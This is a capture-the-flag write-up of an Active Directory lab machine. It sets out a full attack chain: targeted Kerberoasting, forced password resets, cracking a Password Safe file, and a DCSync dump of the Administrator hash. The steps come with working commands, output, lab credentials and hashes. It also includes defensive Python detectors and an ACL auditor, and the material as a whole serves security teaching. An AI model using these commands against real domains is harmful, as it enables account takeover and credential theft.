Overview
The machine starts with given credentials. Enumeration reveals GenericWrite over Michael, so we try targeted Kerberoasting, which fails to crack; we then change his password and find ForceChangePassword over Benjamin. Changing Benjamin's password gives FTP access, where we retrieve a Password Safe file; cracking its master password yields Emily's credentials and a WinRM shell. Emily has GenericWrite over Ethan, so we Kerberoast him and crack his hash; his DCSync rights let us dump the Administrator hash and get a shell as Administrator.
As is common in real life Windows pentests, you will start the Administrator box with credentials for the following account: Username: Olivia, Password: ichliebedich
Enumeration
As usual we're gonna start with nmap
nmap -sC -sV -vv -oA init 10.129.5.235
# Nmap 7.94SVN scan initiated Sat May 30 23:05:49 2026 as: nmap -sC -sV -vv -oA init 10.129.5.235
Nmap scan report for 10.129.5.235
Host is up, received conn-refused (0.20s latency).
Scanned at 2026-05-30 23:05:50 PDT for 55s
Not shown: 988 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2026-05-31 13:06:21Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 65205/tcp): CLEAN (Couldn't connect)
| Check 2 (port 43132/tcp): CLEAN (Couldn't connect)
| Check 3 (port 41532/udp): CLEAN (Failed to receive data)
| Check 4 (port 13232/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
|   date: 2026-05-31T13:06:32
|_  start_date: N/A
|_clock-skew: 6h59m59s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
So we have an AD environment: DNS, LDAP, Kerberos, SMB, some RPC, and FTP. Let's start with the given credentials:
nxc smb 10.129.5.235 -u 'Olivia' -p 'ichliebedich'
SMB 10.129.5.235 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.5.235 445 DC [+] administrator.htb\Olivia:ichliebedich
Always start with the easy things and build your way up, so test the given user against the easy-win port, which is FTP in this case:
nxc ftp 10.129.5.235 -u 'Olivia' -p 'ichliebedich'
FTP 10.129.5.235 21 10.129.5.235 [*] Banner: Microsoft FTP Service
FTP 10.129.5.235 21 10.129.5.235 [-] Olivia:ichliebedich (Response:530 User cannot log in, home directory inaccessible.)
Bloodhound data
FTP didn't work out, but LDAP did, so let's get a BloodHound ingester running:
rusthound -d administrator.htb -i 10.129.5.235 -u 'Olivia' -p 'ichliebedich' -z
---------------------------------------------------
Initializing RustHound at 07:36:49 on 05/31/26
Powered by g0h4n from OpenCyber
---------------------------------------------------
<SNIP>
[2026-05-31T14:36:51Z INFO rusthound::json::maker] 11 users parsed!
[2026-05-31T14:36:51Z INFO rusthound::json::maker] 61 groups parsed!
[2026-05-31T14:36:51Z INFO rusthound::json::maker] 1 computers parsed!
[2026-05-31T14:36:51Z INFO rusthound::json::maker] 1 ous parsed!
[2026-05-31T14:36:51Z INFO rusthound::json::maker] 1 domains parsed!
[2026-05-31T14:36:51Z INFO rusthound::json::maker] 2 gpos parsed!
[2026-05-31T14:36:51Z INFO rusthound::json::maker] 21 containers parsed!
[2026-05-31T14:36:51Z INFO rusthound::json::maker] .//20260531073651_administrator-htb_rusthound.zip created!
RustHound Enumeration Completed at 07:36:51 on 05/31/26! Happy Graphing!
As we can see, the given user has GenericAll over the user michael, so we can try three different attacks:
- Targeted Kerberoasting → set an SPN on the account so it becomes Kerberoastable, then Kerberoast it
- Shadow Credentials → abuse the msDS-KeyCredentialLink attribute to add our own public key and authenticate without changing the password
- Change password → should be your last resort in an actual pentest and must get client approval
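Before picking one of those attacks, a defender wants to know every account that can be taken over this way. The script below is an added example, not part of this writeup and not code from BloodHound or RustHound: it walks a simplified copy of the users.json structure the collectors produce (ObjectIdentifier, Properties.name, Aces[] with PrincipalSID/PrincipalType/RightName) and follows user-to-user rights that allow a password reset or object takeover, so the whole chain Olivia → Michael → Benjamin is reported in one pass. The sample data is constructed to mirror the edges on this box; the SIDs are placeholders.

```python
"""Audit BloodHound-style ACE data for user-to-user takeover rights.

Added example (not from the writeup or any BloodHound tool). Input is a
dict shaped like SharpHound/RustHound users.json; output is the chain of
(source, right, target) hops reachable from a starting account.
"""
from collections import deque

# Rights that let the holder reset the target's password or rewrite its object.
TAKEOVER_RIGHTS = {"GenericAll", "GenericWrite", "ForceChangePassword",
                   "AllExtendedRights", "WriteDacl", "WriteOwner", "Owns"}

# Constructed sample shaped like the "data" list of users.json; SIDs are placeholders.
SAMPLE_USERS = {"data": [
    {"ObjectIdentifier": "S-1-5-21-0-0-0-1108", "Properties": {"name": "OLIVIA@ADMINISTRATOR.HTB"}, "Aces": []},
    {"ObjectIdentifier": "S-1-5-21-0-0-0-1109", "Properties": {"name": "MICHAEL@ADMINISTRATOR.HTB"},
     "Aces": [{"PrincipalSID": "S-1-5-21-0-0-0-1108", "PrincipalType": "User",
               "RightName": "GenericAll", "IsInherited": False}]},
    {"ObjectIdentifier": "S-1-5-21-0-0-0-1110", "Properties": {"name": "BENJAMIN@ADMINISTRATOR.HTB"},
     "Aces": [{"PrincipalSID": "S-1-5-21-0-0-0-1109", "PrincipalType": "User",
               "RightName": "ForceChangePassword", "IsInherited": False}]},
    {"ObjectIdentifier": "S-1-5-21-0-0-0-1111", "Properties": {"name": "EMILY@ADMINISTRATOR.HTB"}, "Aces": []},
    {"ObjectIdentifier": "S-1-5-21-0-0-0-1112", "Properties": {"name": "ETHAN@ADMINISTRATOR.HTB"},
     "Aces": [{"PrincipalSID": "S-1-5-21-0-0-0-1111", "PrincipalType": "User",
               "RightName": "GenericWrite", "IsInherited": False}]},
]}


def build_edges(users):
    """Return {source_name: [(right, target_name), ...]} for takeover rights granted to user principals."""
    names = {u["ObjectIdentifier"]: u["Properties"]["name"] for u in users["data"]}
    edges = {}
    for u in users["data"]:
        for ace in u["Aces"]:
            if ace["RightName"] not in TAKEOVER_RIGHTS or ace["PrincipalType"] != "User":
                continue
            src = names.get(ace["PrincipalSID"])
            if src is None:  # principal is not a user object in this data set
                continue
            edges.setdefault(src, []).append((ace["RightName"], names[u["ObjectIdentifier"]]))
    return edges


def reachable_chain(users, start):
    """Breadth-first walk from `start`: every (source, right, target) hop an
    attacker holding `start` could take by resetting or rewriting accounts."""
    edges = build_edges(users)
    seen, queue, chain = {start}, deque([start]), []
    while queue:
        src = queue.popleft()
        for right, dst in edges.get(src, []):
            chain.append((src, right, dst))
            if dst not in seen:
                seen.add(dst)
                queue.append(dst)
    return chain


if __name__ == "__main__":
    for src, right, dst in reachable_chain(SAMPLE_USERS, "OLIVIA@ADMINISTRATOR.HTB"):
        print(f"{src} --{right}--> {dst}")
```

Run against a real export, load `users.json` with `json.load` and pass the resulting dict in place of `SAMPLE_USERS`; inherited ACEs are kept on purpose, since an inherited GenericAll is just as abusable as an explicit one.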
Let's start with Kerberoasting. Because we can write to the user object, we can add a fake SPN to it, request a ticket for that service and extract the hash from the TGS-REP:
python3 /opt/scripts/targetedKerberoast/targetedKerberoast.py --dc-ip 10.129.5.235 -d administrator.htb -u 'Olivia' -p ichliebedich
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (michael)
$krb5tgs$23$*michael$ADMINISTRATOR.HTB$administrator.htb/michael*$e0cf1ef5a31f26b5a219f51a9d8411f8$744a8d6c784fc27707f023e73ac46e41e912bb51a2b5ea8338e52430fbca69f795e78df68510992fb26275f5db6b7da88727962fdf3431256618bb22863df308575c631cad6ec2a8e219152c5032eca0547c5c8f3a52bd65caad65c4c94bb22ca673da573db97b6740c171deae1d6fd832cdd993f050e24735eaec1f819ca02e0dc5be448c0971ae8ead77c464eba2141b15f188f3c30a9cbb80e5e53192ab51602cb0b2b5449b172b5c605e9daa478b58c0c64c677e34031c797b0b6ee3f6c3110190ed0fb6e2c59b5334abb94066d10b9ff3812b4990106d711449e47a0cc31d8aee8bdfc346be880baab14fcf8781f9b37b3f0a3e13fa023d770a5751f2ba858450f92f29b1f3674a3286e8ba795d82b4b324a6a177d4df0a30716705327f2ee4aec5669604c0969cae45df17d4c5940c872d384b0c2be335d488221aada06018036c23fad2c2ae506a69d028bea9a293fa14495de3a8228b473be3ba2ec095ef309ef2bddece2d23e0c2f9f095e923f2ad6292f71ade30bb53e346f8cbc5d938ca4a2b52dc8141db18ea324e7c21ef1e461dd20c1462c2317341080ffed9bfd1e265ec412d232ed2fbebd562cd4ca79de804ba03f0dc0f41b651ee87b37f6374536f54b031fe2c7694add4a62df740a5a29d7bd1db348de826c17b2c700c29646cff3cd75d6a693a884882ce59b51688711064171848270a6e3942b648276bf95364726a8e0522610db6781fac036b3f57552e67283d7fbae093386faaade1e046ea6c6e65d1d6b10ef1ffa14da4c3779f125237fc8b1759871708f565da9520714443676e016d83acee7d0ea9cb7f085933418a257334d5104d3b67dc3fb0bbc1d3a190155d2464a3c0c6b59e7e50aa7a2c1a13ef530d83e4754a3afade717af7aedc3bb44cebaec08290b3a458dcba0984f3863f33d266a23495bf482c7573e326fdec73fb7886f888d76960c2d3e4bdf10f04d977524a43f1a331de74d59d778aea8e39f590cced47371fb1bd1314b58ed3b97951d480886d138d94318486d19f950c9478c942a0f33ec198af187e02a11654367b0df63b61931f45b6267e285d8aa0e32ad2438326f08c92112b0ff24e71ca923e7f8506d8d6bca9709c6a6dc068bf3f84910fc779978fd2a67ebbb70e4d1e56587a2823746e34440d833cfea217511c3215784187328acac423abcfac48b0b83f5099596c37d6425911ec2fa6b7c9b332e965f010087bdd3df0f7fa4988c83e752b6810c61caa67edb829c603d002b287b2c4967869c2f1273902be347af2b53ecd030242d95c44005d1c9324545c1c7b1d9bbd2ac52b0930771d444bbf4ff2839c6e3ef6e54c5b73b02c15f1d38af4cfdccf4ff05a48005627016b6697e4af2437d9bba0fb294102ab4dc33fe92b3d50348b9cc53ba167fc7ac3d4e8f2747b0a871c62ab0ee8242ca671ceae5aca728ed0947c243c19265f51a3f856005d42ea1a43cf8dcbb8b9aa6726841fcc45ae9836dc5acf6408e9516c9548eaad8f559d
We still need to crack that hash, so I'll use hashcat mode 13100, which is Kerberos 5 TGS-REP etype 23, the RC4-HMAC ticket encryption:
hashcat -a 0 -m 13100 michael.hash /usr/share/wordlists/rockyou.txt
hashcat (v7.1.2-382-g2d71af371) starting
<SNIP>
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*michael$ADMINISTRATOR.HTB$administrato...dbcd72
Time.Started.....: Sun May 31 07:39:47 2026 (20 secs)
Time.Estimated...: Sun May 31 07:40:07 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 757.3 kH/s (2.04ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: kristenanne -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#01.: Util: 90%
Started: Sun May 31 07:39:46 2026
Stopped: Sun May 31 07:40:09 2026
As you can see, it didn't crack.
The Shadow Credentials attack doesn't work here because there is no AD CS CA: the attack relies on certificates, PKINIT and public-key authentication, and with no AD CS in place there is nothing to provide those.
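From the blue side, the targeted Kerberoast above leaves a distinctive two-event trail on the DC: a servicePrincipalName write on a user object (event 5136, which needs "Audit Directory Service Changes" and a SACL on the object) followed seconds later by a TGS request for that same account with Ticket Encryption Type 0x17, RC4-HMAC, the etype 23 ticket that hashcat mode 13100 cracks. The detector below is an added example, not from the writeup and not a vendor rule; the event records are constructed, simplified key=value renderings of what 5136 and 4769 carry, not real exported logs, and the 5136 field names follow the Windows event schema.

```python
"""Correlate SPN writes (5136) with RC4 TGS requests (4769) to spot targeted Kerberoasting.

Added example, not from the writeup. Events are constructed single-line
key=value records that mirror the relevant fields of the real events.
"""
import re
from datetime import datetime, timedelta

# Constructed events mirroring the steps in the writeup (SPN added, ticket requested, SPN removed).
SAMPLE_EVENTS = [
    "2026-05-31T13:38:01Z EventID=5136 SubjectUserName=Olivia ObjectClass=user "
    "ObjectDN=CN=michael,CN=Users,DC=administrator,DC=htb AttributeLDAPDisplayName=servicePrincipalName "
    "AttributeValue=fake/svc123 OperationType=Value_Added",
    "2026-05-31T13:38:02Z EventID=4769 TargetUserName=Olivia@ADMINISTRATOR.HTB ServiceName=michael "
    "ServiceSid=S-1-5-21-0-0-0-1109 TicketEncryptionType=0x17 TicketOptions=0x40810000 IpAddress=10.10.16.83",
    "2026-05-31T13:38:09Z EventID=5136 SubjectUserName=Olivia ObjectClass=user "
    "ObjectDN=CN=michael,CN=Users,DC=administrator,DC=htb AttributeLDAPDisplayName=servicePrincipalName "
    "AttributeValue=fake/svc123 OperationType=Value_Deleted",
    # Normal AES ticket for the DC's own service account: not interesting.
    "2026-05-31T13:40:00Z EventID=4769 TargetUserName=emily@ADMINISTRATOR.HTB ServiceName=DC$ "
    "ServiceSid=S-1-5-21-0-0-0-1000 TicketEncryptionType=0x12 TicketOptions=0x40810000 IpAddress=10.10.16.83",
]

KV = re.compile(r"(\w+)=(\S+)")


def parse(line):
    """Turn 'timestamp key=value ...' into a dict with a parsed 'ts' field."""
    ts, rest = line.split(" ", 1)
    ev = dict(KV.findall(rest))
    ev["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    return ev


def rc4_tgs_requests(lines):
    """Untargeted Kerberoast signal: RC4 (0x17) service tickets for non-computer accounts."""
    return [e for e in map(parse, lines)
            if e.get("EventID") == "4769" and e.get("TicketEncryptionType") == "0x17"
            and not e.get("ServiceName", "").endswith("$")]


def detect_targeted_kerberoast(lines, window=timedelta(minutes=10)):
    """Targeted signal: an SPN added to a *user* object, then an RC4 TGS request
    for that same account within `window`. Returns one alert per pairing."""
    events = [parse(l) for l in lines]
    spn_writes = [e for e in events
                  if e.get("EventID") == "5136" and e.get("ObjectClass") == "user"
                  and e.get("AttributeLDAPDisplayName", "").lower() == "serviceprincipalname"
                  and e.get("OperationType") == "Value_Added"]
    alerts = []
    for w in spn_writes:
        victim = w["ObjectDN"].split(",")[0].split("=", 1)[1].lower()  # CN of the modified user
        for e in events:
            if (e.get("EventID") == "4769" and e.get("TicketEncryptionType") == "0x17"
                    and e.get("ServiceName", "").lower() == victim
                    and w["ts"] <= e["ts"] <= w["ts"] + window):
                alerts.append({"writer": w["SubjectUserName"], "victim": victim,
                               "requester": e["TargetUserName"], "source_ip": e.get("IpAddress")})
    return alerts


if __name__ == "__main__":
    for a in detect_targeted_kerberoast(SAMPLE_EVENTS):
        print(f"targeted Kerberoast: {a['writer']} set SPN on {a['victim']}, "
              f"ticket requested by {a['requester']} from {a['source_ip']}")
```

The RC4 filter matters because a domain whose accounts support AES issues 0x12 tickets by default; a 0x17 request for a user account is the attacker asking for the weaker ticket, and the preceding 5136 pins it to a DACL abuse rather than a pre-existing service account.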
User Michael
So let's try our last resort, changing the password, and see what that user can do:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/administrator]
└──╼ [★]$ bloodyAD --host 10.129.5.235 --domain administrator.htb -u Olivia -p 'ichliebedich' set password michael 'Password123!'
[+] Password changed successfully!
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/administrator]
└──╼ [★]$ nxc smb 10.129.5.235 -u michael -p 'Password123!'
SMB 10.129.5.235 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.5.235 445 DC [+] administrator.htb\michael:Password123!
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/administrator]
└──╼ [★]$ nxc ftp 10.129.5.235 -u michael -p 'Password123!'
FTP 10.129.5.235 21 10.129.5.235 [*] Banner: Microsoft FTP Service
FTP 10.129.5.235 21 10.129.5.235 [-] michael:Password123! (Response:530 User cannot log in, home directory inaccessible.)
As you can see, we now have access as the user michael, so mark him as owned.
User Benjamin
Let's take a look at michael in BloodHound.
This time we only have ForceChangePassword, so we really don't have any option other than changing the password. Let's do it:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/administrator]
└──╼ [★]$ bloodyAD --host 10.129.5.235 --domain administrator.htb -u michael -p 'Password123!' set password benjamin 'Password123!'
[+] Password changed successfully!
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/administrator]
└──╼ [★]$ nxc smb 10.129.5.235 -u benjamin -p 'Password123!'
SMB 10.129.5.235 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.5.235 445 DC [+] administrator.htb\benjamin:Password123!
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/administrator]
└──╼ [★]$ nxc ftp 10.129.5.235 -u benjamin -p 'Password123!'
FTP 10.129.5.235 21 10.129.5.235 [*] Banner: Microsoft FTP Service
FTP 10.129.5.235 21 10.129.5.235 [+] benjamin:Password123!
FTP as Benjamin
As you can see, we have FTP access, so let's take a look at the server; there is an interesting file there:
lftp -u benjamin,'Password123!' administrator.htb
lftp benjamin@administrator.htb:~> ls
10-05-24 09:13AM 952 Backup.psafe3
lftp benjamin@administrator.htb:/> get Backup.psafe3
952 bytes transferred
The .psafe3 extension is short for Password Safe, a password manager that stores credentials in an encrypted database. Like most password managers, it makes the user set a master password, which we don't have in this case.
Password safe crack
Let's crack the password safe: first we'll extract the hash from it, then crack it.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/administrator]
└──╼ [★]$ pwsafe2john Backup.psafe3
Backu:$pwsafe$*3*4ff588b74906263ad2abba592aba35d58bcd3a57e307bf79c8479dec6b3149aa*2048*1a941c10167252410ae04b7b43753aaedb4ec63e3f18c646bb084ec4f0944050
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/administrator]
└──╼ [★]$ echo 'Backu:$pwsafe$*3*4ff588b74906263ad2abba592aba35d58bcd3a57e307bf79c8479dec6b3149aa*2048*1a941c10167252410ae04b7b43753aaedb4ec63e3f18c646bb084ec4f0944050' > safe.hash
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/administrator]
└──╼ [★]$ john safe.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (pwsafe, Password Safe [SHA256 256/256 AVX2 8x])
No password hashes left to crack (see FAQ)
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/administrator]
└──╼ [★]$ john safe.hash --show
Backu:tekieromucho
1 password hash cracked, 0 left
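What john actually did with that `$pwsafe$*3*SALT*ITER*HASH` string is worth seeing, because it explains why rockyou finished in seconds. The block below is an added example, not code from this writeup, John the Ripper or Password Safe: it parses the hash line pwsafe2john printed above and recomputes the Password Safe V3 key stretching from the format specification, P' = SHA-256(password || SALT) followed by ITER further SHA-256 rounds, with the file storing SHA-256(P'). Only 2048 rounds of a raw SHA-256 stand between a wordlist and the safe, which is far cheaper per guess than a memory-hard KDF.

```python
"""Verify a Password Safe V3 master password against a pwsafe2john hash line.

Added example (not from the writeup, John the Ripper or Password Safe).
Implements the V3 key stretching from the format spec and checks the
result against the hash stored in the file header.
"""
import hashlib

# The hash line pwsafe2john printed for Backup.psafe3 in the writeup.
PAGE_HASH = ("Backu:$pwsafe$*3*4ff588b74906263ad2abba592aba35d58bcd3a57e307bf79c8479dec6b3149aa"
             "*2048*1a941c10167252410ae04b7b43753aaedb4ec63e3f18c646bb084ec4f0944050")


def parse_pwsafe_hash(line):
    """Split 'label:$pwsafe$*3*salt*iter*hash' into (salt bytes, iterations, stored hash bytes)."""
    _label, body = line.split(":", 1)
    tag, version, salt_hex, iters, hash_hex = body.split("*")
    if tag != "$pwsafe$" or version != "3":
        raise ValueError("not a Password Safe V3 hash")
    return bytes.fromhex(salt_hex), int(iters), bytes.fromhex(hash_hex)


def stretched_key(password, salt, iterations):
    """Password Safe V3 stretching: P' = SHA-256(P || SALT), then ITER further SHA-256 rounds."""
    p = hashlib.sha256(password.encode("utf-8") + salt).digest()
    for _ in range(iterations):
        p = hashlib.sha256(p).digest()
    return p


def verify_master_password(line, password):
    """True when SHA-256 of the stretched key equals the hash stored in the file header."""
    salt, iters, stored = parse_pwsafe_hash(line)
    return hashlib.sha256(stretched_key(password, salt, iters)).digest() == stored


if __name__ == "__main__":
    salt, iters, _ = parse_pwsafe_hash(PAGE_HASH)
    print(f"salt={salt.hex()[:16]}... iterations={iters}")
    print("tekieromucho ->", verify_master_password(PAGE_HASH, "tekieromucho"))
```

The iteration count is the only tunable: Password Safe lets the user raise it, and an audit of backed-up safes can read ITER from the header the same way and flag files still at a low count.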
That was a successful hit; let's open the safe:
pwsafe Backup.psafe3
The safe opens, and we get 3 passwords for 3 users:
cat creds.txt
emily: UXLCI5iETUsIBoFVTj8yQFKoHjXmb
alexander: UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
emma: WwANQWnmJnGV07WQN8bMS7FMAbjNur
I tried all 3 of them, but the only one that turned out to be working is Emily's:
└──╼ [★]$ nxc smb 10.129.5.235 -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb
SMB 10.129.5.235 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.5.235 445 DC [+] administrator.htb\emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/administrator]
└──╼ [★]$ nxc smb 10.129.5.235 -u alexander -p UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
SMB 10.129.5.235 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.5.235 445 DC [-] administrator.htb\alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw STATUS_LOGON_FAILURE
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/administrator]
└──╼ [★]$ nxc smb 10.129.5.235 -u emma -p WwANQWnmJnGV07WQN8bMS7FMAbjNur
SMB 10.129.5.235 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.5.235 445 DC [-] administrator.htb\emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur STATUS_LOGON_FAILURE
Shell as Emily
I'll test whether she has WinRM access, and she does.
That gets us the user flag.
Back to the BloodHound data: Emily has GenericWrite over Ethan,
so we can do a targeted Kerberoast and see if this user's hash is crackable:
python3 /opt/scripts/targetedKerberoast/targetedKerberoast.py --dc-ip 10.129.5.235 -d administrator.htb -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$f50b9ff0ef54ecd22ab3e7305555efc2$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
User Ethan
Let's do the same as before and crack the hash:
hashcat -a 0 -m 13100 ethan.hash /usr/share/wordlists/rockyou.txt --show
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$be9d2222725dd4ea67d6fac76d3d7503$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:limpbizkit
and we get the password
Shell as administrator
Let's look at what this user can do.
Ethan can DCSync: we trick the DC into sending us the domain hashes over standard replication traffic.
This time I don't need all the domain creds, so I'll ask for the Administrator account only:
secretsdump.py administrtor.htb/ethan:limpbizkit@10.129.5.235 -just-dc-user administrator
Impacket v0.14.0.dev0+20260407.172353.7fc084ad - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2
Administrator:des-cbc-md5:403286f7cdf18385
[*] Cleaning up...
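That DRSUAPI request is the one thing a defender can hang a high-confidence alert on: when "Audit Directory Service Access" is enabled on the DC, the replication call logs event 4662 with Access Mask 0x100 (control access) and a Properties field naming the replication control-access rights, whose GUIDs are fixed by the schema. Only domain controllers and explicitly approved sync accounts should ever exercise them. The detector below is an added example, not from the writeup and not a vendor rule; the 4662 records are constructed key=value renderings (the Properties list is flattened with semicolons), not real exported events, and the `%%7688` token is how Windows renders "Control Access" in that field.

```python
"""Flag DCSync-style replication requests in constructed 4662 events.

Added example, not from the writeup. Any principal outside an explicit
allowlist that exercises DS-Replication-Get-Changes* is reported.
"""
import re

# Control-access right GUIDs from the AD schema (fixed across forests).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"\{([0-9a-fA-F-]{36})\}")
KV = re.compile(r"(\w+)=(\S+)")

# Constructed 4662 records: the DC replicating normally, ethan's DCSync, and an unrelated write.
SAMPLE_4662 = [
    "EventID=4662 SubjectUserName=DC$ SubjectDomainName=ADMINISTRATOR AccessMask=0x100 "
    "Properties=%%7688;{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2};{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662 SubjectUserName=ethan SubjectDomainName=ADMINISTRATOR AccessMask=0x100 "
    "Properties=%%7688;{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2};{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662 SubjectUserName=emily SubjectDomainName=ADMINISTRATOR AccessMask=0x20 "
    "Properties=%%7685;{bf967aba-0de6-11d0-a285-00aa003049e2}",
]


def parse(line):
    """Turn one 'key=value ...' record into a dict."""
    return dict(KV.findall(line))


def replication_rights_used(event):
    """Names of replication control-access rights referenced in the Properties field, in order."""
    return [REPLICATION_RIGHTS[g.lower()] for g in GUID_RE.findall(event.get("Properties", ""))
            if g.lower() in REPLICATION_RIGHTS]


def detect_dcsync(lines, allowed=frozenset()):
    """Return alerts for 4662 control-access events that use replication rights
    from any principal not in `allowed` (lower-cased sAMAccountNames of the DCs
    and approved sync accounts; an explicit list, not a blanket '$' exclusion,
    because a compromised member-server account is exactly what should fire)."""
    alerts = []
    for line in lines:
        e = parse(line)
        if e.get("EventID") != "4662" or e.get("AccessMask") != "0x100":
            continue
        rights = replication_rights_used(e)
        if not rights:
            continue
        user = e.get("SubjectUserName", "")
        if user.lower() in allowed:
            continue
        alerts.append({"user": user, "domain": e.get("SubjectDomainName"), "rights": rights})
    return alerts


if __name__ == "__main__":
    for a in detect_dcsync(SAMPLE_4662, allowed={"dc$"}):
        print(f"possible DCSync: {a['domain']}\\{a['user']} used {', '.join(a['rights'])}")
```

Pair the alert with the account's group membership: the rights can be granted directly on the domain object (as here) and then never show up in Domain Admins, which is why the ACL itself, not group membership, is what this check keys on.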
Let's log in as Administrator.
And this machine is rooted.
Resources
- https://jimmexploit.vercel.app/blog/kerberoasting (covers multiple Kerberoasting techniques)
- https://i-tracing.com/blog/dacl-shadow-credentials/
- https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword
- https://bloodhound.specterops.io/resources/edges/generic-write
- https://www.thehacker.recipes/ad/movement/dacl/targeted-kerberoasting
- https://www.semperis.com/blog/dcsync-attack/
